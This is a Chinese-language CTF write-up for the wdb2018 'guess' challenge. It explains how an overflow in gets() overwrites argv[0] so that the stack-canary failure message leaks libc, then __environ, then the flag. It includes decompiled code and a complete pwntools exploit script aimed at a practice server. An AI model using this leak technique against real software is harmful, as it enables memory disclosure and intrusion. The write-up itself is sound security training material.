wdb2018_guess(stack smash,__environ获取栈变量)

checksec:

 

开启了Canary

 

 main:

__int64 __fastcall main(__int64 a1, char **a2, char **a3)
{
 __WAIT_STATUS stat_loc; // [rsp+14h] [rbp-8Ch]
 int v5; // [rsp+1Ch] [rbp-84h]
 __int64 v6; // [rsp+20h] [rbp-80h]
 __int64 v7; // [rsp+28h] [rbp-78h]
 char buf; // [rsp+30h] [rbp-70h]
 char s2; // [rsp+60h] [rbp-40h]
 unsigned __int64 v10; // [rsp+98h] [rbp-8h]

 v10 = __readfsqword(0x28u);
 v7 = 3LL;
 LODWORD(stat_loc.__uptr) = 0;
 v6 = 0LL;
 sub_4009A6();
 HIDWORD(stat_loc.__iptr) = open("./flag.txt", 0, a2);
 if ( HIDWORD(stat_loc.__iptr) == -1 )
 {
  perror("./flag.txt");
  _exit(-1);
 }
 read(SHIDWORD(stat_loc.__iptr), &buf, 0x30uLL);
 close(SHIDWORD(stat_loc.__iptr));
 puts("This is GUESS FLAG CHALLENGE!");
 while ( 1 )
 {
  if ( v6 >= v7 )
  {
   puts("you have no sense... bye :-) ");
   return 0LL;
  }
  v5 = sub_400A11();
  if ( !v5 )
   break;
  ++v6;
  wait((__WAIT_STATUS)&stat_loc);
 }
 puts("Please type your guessing flag");
 gets(&s2);
 if ( !strcmp(&buf, &s2) )
  puts("You must have great six sense!!!! :-o ");
 else
  puts("You should take more effort to get six sence, and one more challenge!!");
 return 0LL;
}

sub_400A11:

__int64 sub_400A11()
{
 unsigned int v1; // [rsp+Ch] [rbp-4h]

 v1 = fork();
 if ( v1 == -1 )
  err(1, "can not fork");
 return v1;
}

很明显,gets存在栈溢出。flag一开始就被写进栈中。我们需要利用canary报错的信息泄露flag。

 

 

canary检测到栈溢出后的报错信息打印出了程序名,实际上这个文件名是由argv[0]指向的。只要通过栈溢出用自己构造的

字符串地址覆盖掉argv[0]就能打印相应的字符串。

 

关于_environ:https://blog.csdn.net/chennbnbnb/article/details/104035261

我们还不知道偏移是多少,需要通过_environ找到偏移。获取_environ的地址需要先泄露出libc。

所以总计要三次溢出。程序刚好fork了三次。

 

 

 

 计算出输入参数的地址到argv[0]的偏移为0x128

 

第一次溢出获取puts地址:

payload='a'*0x128+p64(puts_got)
a.sendline(payload)
puts_addr=u64(a.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print hex(puts_addr)
libc_base=puts_addr-libc.sym['puts']
environ=libc_base+libc.sym['__environ']

第二次溢出泄露_environ地址:

payload='a'*0x128+p64(environ)
a.sendline(payload)
environ_addr=u64(a.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print hex(environ_addr)

本地调试(sad是我本地flag.txt的内容),算出flag和environ的偏移为0x168

 

 

 

 第三次溢出打印flag:

payload='a'*0x128+p64(environ_addr-0x168)
a.sendline(payload)
#gdb.attach(a)
a.interactive()

 

exp:

#!/usr/bin/python
#coding:utf-8
from pwn import *
from struct import pack

a=remote("node3.buuoj.cn",25266)
#a=process("/root/guess",env = {"LD_PRELOAD": "./libc.so.6"})
libc=ELF("/root/libc-2.23.so")
elf=ELF("/root/guess")
#puts_plt=elf.plt['puts']
puts_got=elf.got['puts']
#context(os='linux',log_level='debug')

payload='a'*0x128+p64(puts_got)
a.sendline(payload)
puts_addr=u64(a.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print hex(puts_addr)
libc_base=puts_addr-libc.sym['puts']
environ=libc_base+libc.sym['__environ']

payload='a'*0x128+p64(environ)
a.sendline(payload)
environ_addr=u64(a.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
print hex(environ_addr)

payload='a'*0x128+p64(environ_addr-0x168)
a.sendline(payload)
#gdb.attach(a)
a.interactive()

成功getflag:

 

点赞

发表评论

昵称和uid可以选填一个,填邮箱必填(留言回复后将会发邮件给你)
tips:输入uid可以快速获得你的昵称和头像